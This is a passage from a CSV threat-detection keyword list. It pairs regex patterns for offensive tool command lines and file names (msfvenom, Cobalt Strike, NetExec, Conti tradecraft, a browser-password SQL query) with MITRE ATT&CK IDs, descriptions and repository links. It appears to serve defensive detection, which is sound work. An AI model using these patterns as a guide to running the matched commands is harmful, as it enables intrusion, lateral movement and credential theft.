TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*exec CMD=/bin/sh -f elf -o *.elf*",".{0,1000}exec\sCMD\=\/bin\/sh\s\-f\self\s\-o\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Exec_Command_Silent.vbs*",".{0,1000}Exec_Command_Silent\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*Exec_Command_WithOutput.vbs*",".{0,1000}Exec_Command_WithOutput\.vbs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*exec_payload_msi*",".{0,1000}exec_payload_msi.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*exec_shellcode.rb*",".{0,1000}exec_shellcode\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ExecCmdImplant*",".{0,1000}ExecCmdImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Exec-Command-Silent.vbs*",".{0,1000}Exec\-Command\-Silent\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*Exec-Command-Silent.vbs*",".{0,1000}Exec\-Command\-Silent\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*--exec-method smbexec*",".{0,1000}\-\-exec\-method\ssmbexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*execmethod*PowerPick*",".{0,1000}execmethod.{0,1000}PowerPick.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*execmethod*PowerShell*",".{0,1000}execmethod.{0,1000}PowerShell.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*execPayloads.txt*",".{0,1000}execPayloads\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*exec-sc-rand.ps1*",".{0,1000}exec\-sc\-rand\.ps1.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*ExecStartPre present! ExecStartPre was modified!*",".{0,1000}ExecStartPre\spresent!\sExecStartPre\swas\smodified!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*Executable_Files-main.zip*",".{0,1000}Executable_Files\-main\.zip.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*execute PowerShell without powershell.exe*",".{0,1000}execute\sPowerShell\swithout\spowershell\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Execute('SELECT origin_url,username_value,password_value,length(password_value*",".{0,1000}Execute\(\'SELECT\sorigin_url,username_value,password_value,length\(password_value.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*execute_assembly SharpCloud*",".{0,1000}execute_assembly\sSharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*execute_bof *",".{0,1000}execute_bof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*execute_dotnet_assembly.*",".{0,1000}execute_dotnet_assembly\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*execute_embed_docm(*",".{0,1000}execute_embed_docm\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*execute_payload(priv_esc*",".{0,1000}execute_payload\(priv_esc.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*execute_pe -PE*",".{0,1000}execute_pe\s\-PE.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*execute_Pezor*",".{0,1000}execute_Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*execute_shellcode *",".{0,1000}execute_shellcode\s.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Execute-ACLight.bat*",".{0,1000}Execute\-ACLight\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Execute-ACLight2.bat*",".{0,1000}Execute\-ACLight2\.bat.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","1","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*execute-assembly *",".{0,1000}execute\-assembly\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*execute-assembly *.exe *",".{0,1000}execute\-assembly\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*execute-assembly *.exe /ldap:all /filter:sysvol*netlogon*ipc$*print$*",".{0,1000}execute\-assembly\s.{0,1000}\.exe\s\/ldap\:all\s\/filter\:sysvol.{0,1000}netlogon.{0,1000}ipc\$.{0,1000}print\$.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*execute-assembly *asreproast*",".{0,1000}execute\-assembly\s.{0,1000}asreproast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly *kerberoast*",".{0,1000}execute\-assembly\s.{0,1000}kerberoast.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*execute-assembly -c EnableAllTokenPrivs.EnableAllTokenPrivs *",".{0,1000}execute\-assembly\s\-c\sEnableAllTokenPrivs\.EnableAllTokenPrivs\s.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*execute-assembly SharpBlock*",".{0,1000}execute\-assembly\sSharpBlock.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*execute-assembly svchost *.exe*",".{0,1000}execute\-assembly\ssvchost\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*execute-assembly*Seatbelt*",".{0,1000}execute\-assembly.{0,1000}Seatbelt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*execute-assembly*sharpcookiemonster*",".{0,1000}execute\-assembly.{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","197","45","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*execute-assembly*sigflip*",".{0,1000}execute\-assembly.{0,1000}sigflip.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*executeAssembly.nim*",".{0,1000}executeAssembly\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*execute-assembly.py*",".{0,1000}execute\-assembly\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Execute-Command-MSSQL*",".{0,1000}Execute\-Command\-MSSQL.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Execute-DNSTXT-Code*",".{0,1000}Execute\-DNSTXT\-Code.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*execute-dotnet-assembly*",".{0,1000}execute\-dotnet\-assembly.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*execute-pe svchost whoami.exe*",".{0,1000}execute\-pe\ssvchost\swhoami\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*execute-pe.py*",".{0,1000}execute\-pe\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*executepersistence*",".{0,1000}executepersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 